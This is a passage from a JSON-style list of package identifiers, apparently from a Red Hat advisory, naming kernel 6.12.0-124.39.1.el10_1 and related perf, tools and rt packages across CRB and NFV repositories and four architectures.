"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
